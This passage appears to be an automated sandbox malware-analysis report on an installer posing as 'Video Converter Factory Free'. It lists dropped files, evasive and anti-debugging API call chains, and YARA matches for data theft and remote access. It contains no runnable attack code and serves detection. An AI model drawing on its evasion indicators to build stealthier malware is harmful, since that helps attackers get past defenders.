                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,2_2_00417CD0
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,2_2_0041F118
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_02D2E9AC
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeWindow / User API: threadDelayed 2409Jump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeWindow / User API: threadDelayed 7512Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\LTDIS13n.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-9MUD1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3BKG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-U3OTV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\uninstall\is-OIHIC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\ltkrn13n.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-DEPI7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcr71.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P8VQC.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-T8AR0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\gdiplus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-L1OQV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\msvcp71.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-7N8CJ.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5971
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_3-61588
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeAPI coverage: 5.5 %
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe TID: 7884Thread sleep count: 2409 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe TID: 7884Thread sleep time: -4818000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe TID: 7352Thread sleep time: -1320000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe TID: 7884Thread sleep count: 7512 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe TID: 7884Thread sleep time: -15024000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00452A60 FindFirstFileA,GetLastError,2_2_00452A60
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,2_2_00474F88
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_004980A4
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00464158
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00462750 FindFirstFileA,FindNextFileA,FindClose,2_2_00462750
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00463CDC
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeThread delayed: delay time: 60000Jump to behavior
                  Source: videoconverterfactory.exe, 00000003.00000002.2623687277.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003326000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: videoconverterfactory.exe, 00000003.00000002.2635410869.0000000003326000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeAPI call chain: ExitProcess graph end nodegraph_0-6768
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeAPI call chain: ExitProcess graph end nodegraph_3-61975
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_3-61483
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D33A08 _memset,IsDebuggerPresent,3_2_02D33A08
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D3E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02D3E6BE
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004502C0
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D25E5F RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,3_2_02D25E5F
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D380E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02D380E8
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,2_2_00478504
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,2_2_0042E09C
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_02D2E860 cpuid 3_2_02D2E860
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: GetLocaleInfoA,0_2_0040520C
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: GetLocaleInfoA,0_2_00405258
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: GetLocaleInfoA,2_2_00408568
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: GetLocaleInfoA,2_2_004085B4
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,2_2_004585C8
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0045559C GetUserNameA,2_2_0045559C
                  Source: C:\Users\user\Desktop\Oz2UhFBTHy.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2631419296.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: videoconverterfactory.exe PID: 7880, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2631419296.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: videoconverterfactory.exe PID: 7880, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_609660FA
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,3_2_6090C1D6
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60963143
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_6096A2BD
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,3_2_6096923E
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,3_2_6096A38C
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_6096748C
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,3_2_609254B1
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6094B407
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6090F435 sqlite3_bind_parameter_index,3_2_6090F435
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,3_2_609255D4
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609255FF sqlite3_bind_text,3_2_609255FF
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,3_2_6096A5EE
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,3_2_6094B54C
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60925686
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,3_2_6094A6C5
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,3_2_609256E5
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B6ED
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6092562A sqlite3_bind_blob,3_2_6092562A
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,3_2_60925655
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6094C64A
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_609687A7
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6095F7F7
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,3_2_6092570B
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F772
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,3_2_60925778
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6090577D sqlite3_bind_parameter_name,3_2_6090577D
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B764
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6090576B sqlite3_bind_parameter_count,3_2_6090576B
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,3_2_6094A894
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F883
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,3_2_6094C8C2
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,3_2_6096281E
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,3_2_6096583A
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,3_2_6095F9AD
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6094A92B
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6090EAE5 sqlite3_transfer_bindings,3_2_6090EAE5
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,3_2_6095FB98
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_6095ECA6
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095FCCE
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6095FDAE
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,3_2_60966DF1
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeCode function: 3_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_60969D75
